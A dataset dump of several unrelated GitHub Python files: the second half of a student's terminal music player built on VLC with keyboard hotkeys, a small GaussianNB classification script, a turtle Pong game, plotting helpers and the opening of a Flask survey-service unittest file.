return 1\n return 0\n\nclass player:#song player object\n\n def __init__(self):#init function for song player\n\n os.environ[\"VLC_VERBOSE\"] = \"0\"\n self.instance = vlc.Instance(\"--audio-filter=visual\")#headphone\n self.instance.log_unset()\n self.player: vlc.MediaPlayer = self.instance.media_player_new()\n\n def load(self,file):#load given song\n\n self.player.set_media(self.instance.media_new(file))\n\n def play_song(self,file):#play given song\n\n self.load(file)\n self.play_pause()\n\n def set_pos(self,pos):#set position of song\n\n self.player.set_time(int(pos)*1000)\n\n def get_pos(self):#get current position of song\n\n return self.player.get_time() / 1000\n\n def forward(self,secs):#forward song\n\n self.set_pos(int(self.get_pos())+secs)\n\n def rewind(self,secs):#rewind song\n\n self.set_pos(int(self.get_pos())-secs)\n\n def play_pause(self):#pause/play song\n\n if self.has_media() and self.player.is_playing():\n self.player.pause()\n elif self.has_media() and not self.player.is_playing():\n self.player.play()\n else:\n return\n\n def play_s(self):#play song\n\n if self.has_media() and not self.player.is_playing():\n self.player.play()\n\n def pause_s(self):#pause song\n \n if self.has_media() and self.player.is_playing():\n self.player.pause()\n\n def stop(self):#stop player\n\n self.player.stop()\n\n def has_media(self):#check if player has media\n\n return self.player.get_media() is not None\n\n def get_length(self):#get total length of media\n\n return self.player.get_length() / 1000\n\n def inc_vol(self):#increase volume\n\n self.player.audio_set_volume(self.player.audio_get_volume() + 10)\n\n def dec_vol(self):#decrease volume\n\n self.player.audio_set_volume(self.player.audio_get_volume() - 10)\n\n def check_pause(self):#check if media is paused\n\n return self.player.is_playing()\n\ndef convert(seconds): \n seconds = seconds % (24 * 3600) \n hour = seconds // 3600\n seconds %= 3600\n minutes = seconds // 60\n seconds %= 60\n if not hour:\n return \"%02d:%02d\" % (minutes, seconds) \n return \"%d:%02d:%02d\" % (hour, minutes, seconds)\n\ndef printProgressBar (iteration, total, prefix = '', suffix = '', decimals = 1, length = 100, fill = '█', printEnd = \"\\r\"):\n if not total:return\n filledLength = int(length * iteration // total)\n bar = fill * filledLength + '-' * (length - filledLength)\n sec = convert(iteration)\n tot = convert(total)\n if tot == \"23:59:59\" or sec == \"23:59:59\":return\n print(f'\\r{prefix} |{bar}| {sec}/{tot}', end = printEnd)\n if iteration == total: \n print()\n\ncurrent = set()\n\ndef on_press(key):#on_press function for listener\n\n global kill_thread\n global mp3_player\n global repeat_var\n global type_music\n\n comb_ctrl = {keyboard.Key.ctrl,keyboard.Key.ctrl_l,keyboard.Key.ctrl_r}\n comb_alt = {keyboard.Key.alt,keyboard.Key.alt_l,keyboard.Key.alt_gr}\n comb_next = {keyboard.Key.right}\n comb_prev = {keyboard.Key.left}\n comb_pause = {keyboard.Key.space}\n comb_inc = {keyboard.Key.up}\n comb_dec = {keyboard.Key.down}\n comb_shuff = {keyboard.KeyCode.from_char('\\x13'),keyboard.KeyCode.from_char('ś')}\n comb_plus = {keyboard.KeyCode.from_char('='),keyboard.KeyCode.from_char('+')}\n comb_minus = {keyboard.KeyCode.from_char('\\x1f'),keyboard.KeyCode.from_char('-')}\n comb_add = {keyboard.KeyCode.from_char('\\x01'),keyboard.KeyCode.from_char('ā')}\n comb_rep = {keyboard.KeyCode.from_char('\\x12'),keyboard.KeyCode.from_char('r̥')}\n comb_quit = {keyboard.KeyCode.from_char('\\x11'),keyboard.KeyCode.from_char('æ')}\n comb_master = [comb_add,comb_dec,comb_inc,comb_shuff,comb_quit,comb_plus,comb_rep,comb_pause,comb_minus,comb_prev,comb_alt,comb_ctrl,comb_next]\n \n try:\n if kill_thread and mp3_player.has_media(): \n if key == keyboard.Key.media_play_pause:#listen for play/pause key \n try:\n mp3_player.play_pause()\n except Exception as e:\n pri = colored('[-] COULD NOT PAUSE/PLAY SONG ','red',attrs=['bold'])\n print('\\n')\n print(pri)\n if os.name == \"posix\":\n os.system('killall iTunes')\n if len(current) >= 2 and any(k in current for k in comb_ctrl) and any(k in current for k in comb_alt) and [b for a in comb_master for b in a if b == key]: \n if key in comb_next:#listen for next song keyscurrent.add(key)\n if type_music == \"dir\":\n try: \n play_next()\n except Exception as e:\n pri = colored('[-] COULD NOT PLAY NEXT SONG ','red',attrs=['bold'])\n print('\\n')\n print(pri)\n if key in comb_quit:#listen for quit keys\n if 1:\n kill_thread = 0\n mp3_player.stop() \n if key in comb_prev:#listen for previous song keys\n if type_music == \"dir\":\n try:\n play_prev()\n except Exception as e:\n pri = colored('[-] COULD NOT PLAY PREVIOUS SONG ','red',attrs=['bold'])\n print('\\n')\n print(pri)\n if key in comb_pause:#listen for pause/play keys\n if 1:\n try:\n mp3_player.play_pause()\n except Exception as e:\n pri = colored('[-] COULD NOT PAUSE/PLAY SONG ','red',attrs=['bold'])\n print('\\n')\n print(pri)\n if key in comb_shuff:#listen for shuffle keys\n if type_music == \"dir\":\n try:\n shuffle(playlist)\n except Exception as e:\n pri = colored('[-] COULD NOT SHUFFLE PLAYLIST ','red',attrs=['bold'])\n print('\\n')\n print(pri)\n if key in comb_inc:#listen for volume increase keys \n if 1:\n try:\n mp3_player.inc_vol()\n except Exception as e:\n pri = colored('[-] COULD NOT INCREASE VOLUME ','red',attrs=['bold'])\n print('\\n')\n print(pri)\n if key in comb_dec:#listen for volume decrease keys \n if 1:\n try:\n mp3_player.dec_vol()\n except Exception as e:\n pri = colored('[-] COULD NOT DECREASE VOLUME ','red',attrs=['bold'])\n print('\\n')\n print(pri)\n if key in comb_add:#listen for add to playlist keys\n if 1:\n try:\n add_to() \n except Exception as e:\n print(e)\n pri = colored('[-] COULD NOT ADD CURRENT SONG TO PERSONAL PLAYLIST ','red',attrs=['bold'])\n print('\\n')\n print(pri)\n if key in comb_rep:#listen for repeat keys\n if type_music == \"single\": \n try:\n repeat_var = 1\n pri = colored('[-] PLAYING CURRENT SONG ON REPEAT ','green',attrs=['bold'])\n print('\\n')\n print(pri)\n except Exception as e:\n pri = colored('[-] COULD NOT REPEAT CURRENT SONG ','red',attrs=['bold'])\n print('\\n')\n print(pri)\n if key in comb_plus:#listen for seek song keys\n if 1:\n try:\n mp3_player.forward(3) \n except Exception as e:\n print(e)\n pri = colored('[-] COULD NOT SEEK SONG ','red',attrs=['bold'])\n print('\\n')\n print(pri)\n if key in comb_minus:#listen for rewind song keys\n if 1:\n try:\n mp3_player.rewind(3) \n except Exception as e:\n print(e)\n pri = colored('[-] COULD NOT REWIND SONG ','red',attrs=['bold'])\n print('\\n')\n print(pri)\n else:\n current.add(key)\n except:\n pass\n\n\ndef menu_dir(name):#print key to use and song data for folder player\n\n if 1:\n m1 = \"\"\"\n\n KEY TO USE THE MUSIC PLAYER\n\n PLAY NEXT SONG -> PRESS CTRL+ALT+RIGHT ARROW\n PLAY PREVIOUS SONG -> PRESS CTRL+ALT+LEFT ARROW\n PAUSE CURRENT SONG -> PRESS CTRL+ALT+SPACE\n PLAY CURRENT SONG -> PRESS CTRL+ALT+SPACE\n SHUFFLE PLAYLIST -> PRESS CTRL+ALT+S\n INCREASE VOLUME -> PRESS CTRL+ALT+UP ARROW\n DECREASE VOLUME -> PRESS CTRL+ALT+DOWN ARROW\n FORWARD CURRENT SONG BY 3 SECONDS -> PRESS CTRL+ALT+PLUS\n REWIND CURRENT SONG BY 3 SECONDS -> PRESS CTRL+ALT+MINUS\n ADD CURRENT SONG TO PERSONAL PLAYLIST -> PRESS CTRL+ALT+A\n QUIT TO MAIN MENU -> PRESS CTRL+ALT+Q\n\n \"\"\"\n if name:\n m1 += '\\n\\n\\n\\n[-] NOW PLAYING '+base_name(name)+'\\n\\n' \n return colored(m1,'green',attrs=['bold'])\n\ndef single(name):#print key to use and song data for single track\n\n if 1:\n m1 = \"\"\"\n\n KEY TO USE THE MUSIC PLAYER\n\n PAUSE CURRENT SONG -> PRESS CTRL+ALT+ENTER\n PLAY CURRENT SONG -> PRESS CTRL+ALT+ENTER\n INCREASE VOLUME -> PRESS CTRL+ALT+UP ARROW\n DECREASE VOLUME -> PRESS CTRL+ALT+DOWN ARROW\n FORWARD CURRENT SONG BY 3 SECONDS -> PRESS CTRL+ALT+PLUS\n REWIND CURRENT SONG BY 3 SECONDS -> PRESS CTRL+ALT+MINUS\n PLAY CURRENT SONG IN REPEAT -> PRESS CTRL+ALT+R OR\n ADD CURRENT SONG TO PERSONAL PLAYLIST -> PRESS CTRL+ALT+A OR\n QUIT TO MAIN MENU -> PRESS CTRL+ALT+Q OR\n\n \"\"\"\n if name:\n m1 += '\\n\\n\\n\\n[-] NOW PLAYING '+base_name(name)+'\\n\\n' \n return colored(m1,'green',attrs=['bold'])\n \ndef play_next():#play next song\n\n global type_music\n global kill_thread\n global s_name\n global repeat_var\n global progress\n\n if not playlist and type_music == \"dir\":\n kill_thread = 0\n mp3_player.stop()\n return\n if type_music == \"dir\":\n played.append(playlist.pop(0))\n mp3_player.play_song(played[-1])\n if os.name == \"nt\":\n os.system('cls')\n else:\n os.system('clear')\n print(menu_dir(played[-1]))\n sleep(0.5)\n #printProgressBar(0, mp3_player.get_length(), prefix = '⏪⏯ ⏩️', suffix = '', length = 84)\n progress = 1\n elif type_music == \"single\":\n mp3_player.play_song(s_name)\n if os.name == \"nt\":\n os.system('cls')\n else:\n os.system('clear')\n print(single(s_name))\n sleep(0.5)\n #printProgressBar(0, mp3_player.get_length(), prefix = '⏪⏯ ⏩️', suffix = '', length = 84)\n progress = 1\n\ndef play_prev():#play previous song\n\n global progress\n\n playlist.insert(0,played.pop(-1))\n mp3_player.play_song(played[-1])\n if os.name == \"nt\":\n os.system('cls')\n else:\n os.system('clear')\n if 1:\n print(menu_dir(played[-1]))\n sleep(0.5)\n #printProgressBar(0, mp3_player.get_length(), prefix = '⏪⏯ ⏩️', suffix = '', length = 84)\n progress = 1\n\ndef add_to():#add song to personal playlist\n\n if type_music == \"dir\" and base_name(played[-1]) not in os.listdir(per_folder):\n shutil.copyfile(played[-1],per_folder+'/'+base_name(played[-1]))\n elif type_music == \"single\" and base_name(s_name) not in os.listdir(per_folder):\n shutil.copyfile(s_name,per_folder+'/'+base_name(s_name))\n else:\n print()\n pri = colored('[-] SONG ALREADY EXISTS IN PLAYLIST','red',attrs=['bold'])\n print(pri)\n return\n pri = colored('[-] ADDED CURRENT SONG TO PERSONAL PLAYLIST ','green',attrs=['bold'])\n print('\\n')\n print(pri)\n\ndef on_release(key):#on_release function for keylistener\n \n try:\n current.remove(key)\n except KeyError:\n pass\n\ndef main1():#listener function for keys from keyboard\n\n global kill_thread\n while kill_thread:\n with keyboard.Listener(on_press=on_press,on_release=on_release) as listener:\n listener.join()\n\ndef not_play():#check if media is playing\n\n global mp3_player\n sleep(5)\n return not mp3_player.has_media()\n\ndef main2():#autoplay function for folder player\n\n global kill_thread\n\n play_next()\n while kill_thread or mp3_player.has_media(): \n if playlist: \n if mp3_player.has_media(): \n if round(mp3_player.get_pos(),0) != round(mp3_player.get_length(),0):\n printProgressBar(mp3_player.get_pos(), mp3_player.get_length(), prefix = '⏪⏯ ⏩️', suffix = '', length = 84)\n continue \n if not_play() or round(mp3_player.get_pos(),0) == round(mp3_player.get_length(),0):\n play_next() \n else:\n while progress: \n printProgressBar(mp3_player.get_pos(), mp3_player.get_length(), prefix = '⏪⏯ ⏩️', suffix = '', length = 84)\n else: \n break \n\ndef main4():#autoplay function for single track player\n\n global kill_thread\n global repeat_var\n\n play_next()\n while kill_thread:\n if mp3_player.has_media():\n if round(mp3_player.get_pos(),0) != round(mp3_player.get_length(),0):\n printProgressBar(mp3_player.get_pos(), mp3_player.get_length(), prefix = '⏪⏯ ⏩️', suffix = '', length = 84)\n continue\n elif repeat_var:\n mp3_player.set_pos(0)\n else:\n kill_thread = 0\n if not kill_thread:\n return\n if repeat_var:\n try:\n mp3_player.set_pos(0)\n continue\n except: \n if os.name == \"nt\":\n os.system('cls')\n else:\n os.system('clear')\n print()\n pri = colored('[-] SONG HAS BEEN MOVED TO DIFFERENT PATH','red',attrs=['bold'])\n print(pri)\n kill_thread = 0\n break \n break\n\ndef dir_music(folder,choice):#driver function for playing all songs from a folder\n\n global mp3_player\n global type_music\n global playlist\n global played\n global per_folder\n global kill_thread\n global s_name\n global repeat_var\n global progress\n\n mp3_player = player()\n playlist = get_songs(folder,choice)\n if not playlist:\n return 0\n t2 = Thread(target = main2)\n t2.setDaemon = True\n t2.start()#thread to keep autopay and manual control running side by side\n while 1:#keep checking for kill_thread var \n if not kill_thread:\n playlist = []\n progress = 0 \n if os.name == \"nt\":\n os.system('cls')\n else:\n os.system('clear')\n return 1\n\ndef single_music():#driver function for playing a single song\n\n global mp3_player\n global type_music\n global playlist\n global played\n global per_folder\n global kill_thread\n global s_name\n global repeat_var\n global progress\n\n mp3_player = player()\n t2 = Thread(target = main4)\n t2.setDaemon = True\n t2.start()#thread to keep autopay and manual control running side by side\n sleep(1)\n while 1:#keep checking for kill_thread var\n if not kill_thread:\n progress = 0\n if os.name == \"nt\":\n os.system('cls')\n else:\n os.system('clear')\n return\n\ndef add_per(folder):#add current song to playlist\n\n while 1:\n try:\n print()\n inp = colored('[-] ENTER FULL PATH TO SONG(S) SEPERATED BY COMMAS IF MANY ')\n filez = input(inp)\n except:\n print()\n pri = colored('[-] INVALID PATH')\n print(pri)\n continue\n file_list = filez.split(',')\n check = [a for a in file_list if a[-3:] == \"mp3\" or a[-3:] == \"wav\" or a[-3:] == \"ogg\" or a[-4:] == \"flac\" and os.path.isfile(a)]\n if not check:\n for a in check:\n print()\n pri = colored('[-] INVALID SONG '+a,'red',attrs=['bold'])\n print(pri)\n continue\n break\n for a in file_list:\n shutil.copyfile(a,per_folder+'/'+base_name(a))\n print()\n pri = colored('[-] ADDED '+base_name(a)+' TO PERSONAL PLAYLIST','green',attrs=['bold'])\n print(pri)\n\ndef list_per(folder):#list all tracks in personal playlist\n\n print()\n m1 = \"[-] TRACKS IN PLAYLIST\\n\\n\"\n count = 0\n list_songs = os.listdir(folder)\n for a in list_songs:\n count += 1\n if a[-3:] == \"mp3\" or a[-3:] == \"wav\" or a[-3:] == \"ogg\" or a[-4:] == \"flac\":\n m1 += str(count)+') '+a + '\\n'\n if m1 != \"[-] TRACKS IN PLAYLIST\\n\\n\":\n pri = colored(m1,'green',attrs=['bold'])\n else:\n return 0\n print(pri)\n print('\\n\\n\\n')\n return 1\n\ndef make_archive(source, destination):#make .zip file in desired location\n\n base = base_name(destination)\n name = base.split('.')[0]\n format = base.split('.')[1]\n archive_from = os.path.dirname(source)\n archive_to = base_name(source.strip(os.sep))\n shutil.make_archive(name, format, archive_from, archive_to)\n shutil.move('%s.%s'%(name,format), destination)\n\ndef export_per(folder):#export personal playlist as .zip file in desired location\n\n while 1:\n try:\n print()\n inp = colored('[-] ENTER PATH TO EXPORT ','green',attrs=['bold'])\n folder2 = input(inp)\n if not os.path.isdir(folder):\n print('[-] PATH DOES NOT EXIST')\n continue\n pri2 = ''\n break\n except EOFError:\n print()\n pri = colored('[-] INVALID CHOICE','red',attrs=['bold'])\n print(pri)\n if os.name == \"nt\":\n folder2 += '\\\\playlist.zip'\n else:\n folder2 += '/playlist.zip'\n try:\n make_archive(folder,folder2)\n except:\n pri2=colored('[-] COULD NOT EXPORT PLAYLIST ','red',attrs=['bold'])\n return\n if pri2:\n if os.name == \"nt\":\n os.system('cls')\n else:\n os.system('clear')\n print()\n print(pri2)\n return\n pri2 = colored('[-] EXPORTED PLAYLIST AS '+folder2,'green',attrs=['bold'])\n if os.name == \"nt\":\n os.system('cls')\n else:\n os.system('clear')\n print()\n print(pri2)\n\ndef open_f(folder):#open personal playlist to view and edit\n\n if os.name == \"nt\":\n if os.path.isdir(folder):\n os.system('explorer '+folder)\n else:\n print('\\n')\n pri = colored(\"[-] FOLDER DOES NOT EXIST\",'red',attrs=['bold'])\n print(pri)\n elif os.name == \"posix\":\n if os.path.isdir(folder):\n os.system('open '+folder)\n else:\n print('\\n')\n pri = colored(\"[-] FOLDER DOES NOT EXIST\",'red',attrs=['bold'])\n print(pri)\n else:\n if os.path.isdir(folder):\n os.system('xdg-open '+folder)\n else:\n print('\\n')\n pri = colored(\"[-] FOLDER DOES NOT EXIST\",'red',attrs=['bold'])\n print(pri)\n if os.name == \"nt\":\n os.system('cls')\n else:\n os.system('clear')\n\ndef main_menu():#driver function\n \n global mp3_player\n global type_music\n global playlist\n global played\n global per_folder\n global kill_thread\n global s_name\n global repeat_var\n\n t1 = Thread(target = main1)\n t1.setDaemon = True\n t1.start()#thread for key listening\n if os.name == \"nt\":\n os.system('cls')\n else:\n os.system('clear')\n fancy_text = \"\"\"\n \n\n /$$ /$$ /$$ /$$ /$$$$$$ /$$$$$$ /$$$$$$ /$$$$$$$ /$$$$$$ /$$ /$$\n| $$$ /$$$| $$ | $$ /$$__ $$|_ $$_/ /$$__ $$ | $$__ $$ /$$__ $$| $$ / $$\n| $$$$ /$$$$| $$ | $$| $$ \\__/ | $$ | $$ \\__/ | $$ \\ $$| $$ \\ $$| $$/ $$/\n| $$ $$/$$ $$| $$ | $$| $$$$$$ | $$ | $$ | $$$$$$$ | $$ | $$ \\ $$$$/ \n| $$ $$$| $$| $$ | $$ \\____ $$ | $$ | $$ | $$__ $$| $$ | $$ >$$ $$ \n| $$\\ $ | $$| $$ | $$ /$$ \\ $$ | $$ | $$ $$ | $$ \\ $$| $$ | $$ /$$/\\ $$\n| $$ \\/ | $$| $$$$$$/| $$$$$$/ /$$$$$$| $$$$$$/ | $$$$$$$/| $$$$$$/| $$ \\ $$\n|__/ |__/ \\______/ \\______/ |______/ \\______/ |_______/ \\______/ |__/ |__/ \n v1.0\n\n A COMPUTER SCIENCE PROJECT BY ANIRUDH R OF CLASS 12 E\n\n\n\"\"\"\n menu = \"\"\"\n[-] SELECT YOUR CHOICE\n\n1) PLAY A SONG\n2) PLAY SONGS FROM A FOLDER\n3) PLAY SONGS FROM MULTIPLE FOLDERS\n4) PLAY PERSONAL PLAYLIST\n5) LIST SONGS IN PERSONAL PLAYLIST\n6) EXPORT PERSONAL PLAYLIST AS .zip FILE\n7) OPEN PERSONAL PLAYLIST TO VIEW\n8) ADD SONG(S) TO PERSONAL PLAYLIST\n9) DOWNLOAD SONGS TO PERSONAL PLAYLIST\n10) QUIT\n\n\"\"\"\n menu = colored(fancy_text + menu,'green',attrs=['bold'])\n while 1:\n try:\n print()\n print('\\r'*100)\n choice = str(input(menu))\n choice = choice[-2:]\n if choice.isnumeric() :\n choice = int(choice)\n else:\n choice = int(choice[-1])\n if choice not in (1,2,3,4,5,6,7,8,9,10):\n print()\n pri = colored('[-] INVALID CHOICE','red',attrs=['bold'])\n print(pri)\n continue \n except:\n pri = colored('[-] INVALID CHOICE','red',attrs=['bold'])\n print(pri)\n continue\n if os.name == \"nt\":\n os.system('cls')\n else:\n os.system('clear')\n if choice == 10:\n print()\n pri = colored('[-] THANK YOU FOR USING MUSIC BOX :)','green',attrs=['bold'])\n print(pri)\n return\n elif choice == 1:\n type_music = \"single\"\n kill_thread = 1\n while 1:\n try:\n print()\n inp = colored('[-] ENTER FULL PATH TO SONG ','green',attrs=['bold'])\n s_name = input(inp)\n s_name = parse_trailing_space(s_name)\n if not os.path.isfile(s_name):\n print()\n pri = colored('[-] FILE DOES NOT EXIST','red',attrs=['bold'])\n print(pri)\n continue\n break\n except:\n print()\n pri = colored('[-] INVALID CHOICE','red',attrs=['bold'])\n print(pri)\n single_music()\n elif choice == 2:\n type_music = \"dir\"\n kill_thread = 1\n while 1:\n try:\n print()\n inp = colored('[-] ENTER FULL PATH TO DIRECTORY CONTAINING SONGS ','green',attrs=['bold'])\n folder = input(inp)\n folder = parse_trailing_space(folder)\n if not os.path.isdir(folder):\n print()\n pri = colored('[-] PATH DOES NOT EXIST','red',attrs=['bold'])\n print(pri)\n continue\n break\n except:\n print()\n pri = colored('[-] INVALID CHOICE','red',attrs=['bold'])\n print(pri)\n while 1:\n try:\n inp = colored('[-] DO YOU WANT TO INCLUDE SONGS FROM SUBFOLDERS(Y/N)? ','green',attrs=['bold'])\n print()\n multi = input(inp)\n if multi.lower() not in 'yn':\n print()\n pri = colored('[-] INVALID CHOICE ','red',attrs=['bold'])\n print(pri)\n continue\n multi = 1 if multi.lower() == 'y' else 0\n break\n except:\n print()\n pri = colored('[-] INVALID CHOICE ','red',attrs=['bold'])\n print(pri)\n continue\n if not dir_music([folder],multi):\n print()\n pri = colored('[-] NO SONGS IN FOLDER','red',attrs=['bold'])\n print(pri)\n elif choice == 3:\n type_music = \"dir\"\n kill_thread = 1\n while 1:\n try:\n print()\n inp = colored('[-] ENTER FULL PATH TO DIRECTORIES SEPERATED BY COMMAS ','green',attrs=['bold'])\n folder = input(inp).split(',')\n folder = [parse_trailing_space(a) for a in folder]\n for a in folder:\n if not os.path.isdir(a):\n print()\n pri = colored('[-] PATH'+a+'DOES NOT EXIST','red',attrs=['bold'])\n print(pri)\n continue\n break\n except:\n print()\n pri = colored('[-] INVALID CHOICE','red',attrs=['bold'])\n print(pri)\n while 1:\n try:\n inp = colored('[-] DO YOU WANT TO INCLUDE SONGS FROM SUBFOLDERS(Y/N)? ','green',attrs=['bold'])\n print()\n multi = input(inp)\n if multi.lower() not in 'yn':\n print()\n pri = colored('[-] INVALID CHOICE ','red',attrs=['bold'])\n print(pri)\n continue\n multi = 1 if multi.lower() == 'y' else 0\n break\n except:\n print()\n pri = colored('[-] INVALID CHOICE ','red',attrs=['bold'])\n print(pri)\n continue\n if not dir_music(folder,multi):\n print()\n pri = colored('[-] NO SONGS IN FOLDERS','red',attrs=['bold'])\n print(pri)\n elif choice == 4:\n type_music = \"dir\"\n kill_thread = 1\n if list_per(per_folder):\n dir_music([per_folder],0)\n else:\n pri = colored('[-] NO SONG(S) IN PERSONAL PLAYLIST','red',attrs=['bold'])\n print(pri)\n elif choice == 5:\n list_per(per_folder)\n elif choice == 6:\n export_per(per_folder)\n elif choice == 7:\n open_f(per_folder)\n elif choice == 8:\n add_per(per_folder)\n elif choice == 9:\n looper = 1\n while looper:\n try:\n print()\n inp = colored('[-] ENTER FULL NAME OF THE SONG ','green',attrs=['bold'])\n name = input(inp)\n if os.path.isfile(per_folder+'/'+name.lower()+'.mp3'):\n if os.name == \"nt\":\n os.system('cls')\n else:\n os.system('clear')\n print()\n pri = colored('[-] SONG ALREADY EXISTS IN YOUR PLAYLIST')\n print(pri)\n looper = 0\n continue\n break\n except:\n print()\n pri = colored('[-] INVALID CHOICE','red',attrs=['bold'])\n print(pri)\n if looper:\n downloader = down_songs(name,per_folder+'/')\n search = downloader.search()\n if search:\n if downloader.download(downloader.get_link(search)):\n if os.name == \"nt\":\n os.system('cls')\n else:\n os.system('clear')\n print()\n pri = colored('[-] DOWNLOADED SONG TO YOUR PLAYLIST','green',attrs=['bold'])\n print(pri)\n else:\n if os.name == \"nt\":\n os.system('cls')\n else:\n os.system('clear')\n print()\n pri = colored('[-] COULD NOT DOWNLOAD SONG TO YOUR PLAYLIST','red',attrs=['bold'])\n print(pri)\n\nif __name__ == \"__main__\":\n main_menu() \n if os.name != 'nt':#scrap all threads\n os.system('killall Python > /dev/null')\n else:#scrap all threads\n os.system('taskkill /F /IM python.exe /T')","repo_name":"Anirudh-R-2506/Music-Box","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":35181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22010383271","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import f1_score\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.naive_bayes import GaussianNB\n\ndata_train = pd.read_csv('merge.csv')\ndata_test = pd.read_csv('test/test_merge.csv')\nfeatures = [f for f in data_train.columns if f not in ['cust_id','label']]\nx_train = data_train[features]\nx_test = data_test[features]\ny_train = data_train['label']\n\nclf = GaussianNB()\nclf.fit(x_train,y_train)\npredictions = clf.predict(x_test)\n\n# print(predictions)\n# label_result = pd.read_csv('label.csv')\n# # print('********************************')\n# print(f1_score(label_result['label'].values, predictions))\n\npredictions=predictions.astype('int')\ndata_test=data_test[['cust_id']]\ndata_test['label']=predictions\ndata_test.to_excel('./result.xlsx',index=False)\nprint('********************************')","repo_name":"ThinkingXuan/loan-risk-prediction","sub_path":"models/_GaussianNB.py","file_name":"_GaussianNB.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"61"} +{"seq_id":"21563816308","text":"from turtle import Turtle\nimport time\nimport random\n\n# create class for paddles\nclass Paddles(Turtle):\n def __init__(self):\n super().__init__()\n self.shape('square')\n self.color('white')\n self.shapesize(stretch_wid=5, stretch_len=1)\n self.pu()\n\n def move_up(self):\n if self.ycor() <= 235:\n self.sety(self.ycor() + 30)\n\n def move_down(self):\n if self.ycor() >= -225:\n self.sety(self.ycor() - 30)\n\n\nclass Ball(Turtle):\n def __init__(self):\n super().__init__()\n self.shape('circle')\n self.color('white')\n # self.shapesize(stretch_wid=5, stretch_len=1)\n self.pu()\n self.speed_x = 10\n self.speed_y = 10\n\n def move(self):\n self.setx(self.xcor() + self.speed_x)\n self.sety(self.ycor() + self.speed_y)\n\n def bounce_wall(self):\n self.speed_y *= -1\n\n def bounce_paddle(self):\n self.speed_x *= -1\n if self.heading() == 180:\n self.setheading(0)\n else:\n self.setheading(180)\n\n def increase_speed(self):\n self.speed_x *= 1.05\n self.speed_y *= 1.05\n\n def ball_reset(self):\n self.home()\n if self.speed_x < 0:\n self.speed_x = 10\n else:\n self.speed_x = -10\n self.speed_y = random.choice([-10, 10])\n","repo_name":"moe221/Small-GUI-Projects","sub_path":"Pong/game_tools.py","file_name":"game_tools.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71819650754","text":"import matplotlib.pyplot as plt\n\n_figsize = (30, 15)\n\ndef plot_accuracies(accuracies_train, accuracies_val):\n\tplt.figure(figsize=_figsize)\n\tplt.rcParams.update({\"font.size\": 20})\n\n\tplt.plot(accuracies_train, color=\"green\", label=\"Train accuracy\")\n\tplt.plot(accuracies_val, color=\"blue\", label=\"Val accuracy\")\n\tplt.axhline(1, color=\"black\", label=\"1\", linestyle=\"dashed\")\n\n\tplt.legend()\n\tplt.xlabel(\"Epochs\")\n\tplt.ylabel(\"Accuracy\")\n\tplt.title(\"Accuracies\")\n\tplt.show()\n\ndef plot_losses(losses_train, losses_val):\n\tplt.figure(figsize=_figsize)\n\tplt.rcParams.update({\"font.size\": 20})\n\n\tplt.plot(losses_train, color=\"green\", label=\"Train loss\")\n\tplt.plot(losses_val, color=\"blue\", label=\"Val loss\")\n\n\tplt.legend()\n\tplt.xlabel(\"Epochs\")\n\tplt.ylabel(\"Loss\")\n\tplt.title(\"Losses\")\n\tplt.show()\n\ndef plot_mnist(loader):\n\tfig = plt.figure(figsize=_figsize)\n\trows = 2\n\tcolumns = 5\n\tposition = 1\n\n\tfor images, labels in loader:\n\t\timages = images[:10]\n\t\tfor image in images:\n\t\t\tfig.add_subplot(rows, columns, position)\n\t\t\tplt.imshow(image.permute(1, 2, 0), cmap=\"gray\")\n\t\t\tposition += 1\n\t\tbreak\n\tplt.plot()","repo_name":"Githubowy-Juliusz/SDT","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8096823583","text":"import unittest\nimport os\nfrom flask import Flask\nfrom dotenv import load_dotenv\nfrom src import db\nfrom src.services.survey_service import survey_service as ss\nfrom src.services.survey_choices_service import survey_choices_service as scs\nfrom src.repositories.user_repository import user_repository as ur\nfrom src.repositories.user_rankings_repository import user_rankings_repository as urr\nfrom src.services.survey_teachers_service import survey_teachers_service as sts\nfrom src.entities.user import User\nfrom src.tools.db_tools import clear_database\nimport datetime\nimport json\n\nclass TestSurveyService(unittest.TestCase):\n def setUp(self):\n load_dotenv()\n self.app = Flask(__name__)\n self.app.config[\"SECRET_KEY\"] = os.getenv(\"SECRET_KEY\")\n self.app.config[\"SQLALCHEMY_DATABASE_URI\"] = os.getenv(\"DATABASE_URL\")\n db.init_app(self.app)\n\n self.app_context = self.app.app_context()\n self.app_context.push()\n\n clear_database()\n\n self.setup_users()\n # Remember to add survey choices later (Must be relevant names or tests will fail D:)\n self.edit_dict = {\n \"surveyGroupname\": \"Safest (most dangerous lmao) PED's\",\n \"surveyInformation\": \"No way in hell will these have long term affects on your body, mind and soul.\",\n \"startdate\": \"01.07.2023\",\n \"starttime\": \"00:00\",\n \"enddate\": \"31.12.2077\",\n \"endtime\": \"00:00\",\n }\n with open(\"tests/test_files/test_survey1.json\", 'r') as openfile:\n # open as JSON instead of TextIOWrapper or something\n self.json_object = json.load(openfile)\n\n def setup_users(self):\n self.ur = ur\n user1 = User(\"Not on tren Testerr\", \"feelsbadman@tester.com\", True)\n user2 = User(\"Not on anabolic\", \"anabolic@tester.com\", True)\n user3 = User(\"trt enjoyer\", \"ttrt@tester.com\", True)\n self.ur.register(user1)\n self.ur.register(user2)\n self.ur.register(user3)\n self.user_id = ur.find_by_email(user1.email)[0]\n self.user_id2 = ur.find_by_email(user2.email)[0]\n self.user_id3 = ur.find_by_email(user3.email)[0]\n self.user_email = user1.email\n\n\n def tearDown(self):\n db.drop_all()\n self.app_context.pop()\n\n def test_get_survey_name_nonexisting_id(self):\n \"\"\"\n Test that no survey name is returned for an invalid survey id\n \"\"\"\n name = ss.get_survey_name(\"ITSNOTREAL\")\n self.assertEqual(name, False)\n\n def test_elomake_csv_to_dict_parsing_case_normal(self):\n '''\n Tests that Elomake imported CSV is parsed correctly to a dict\n '''\n file = 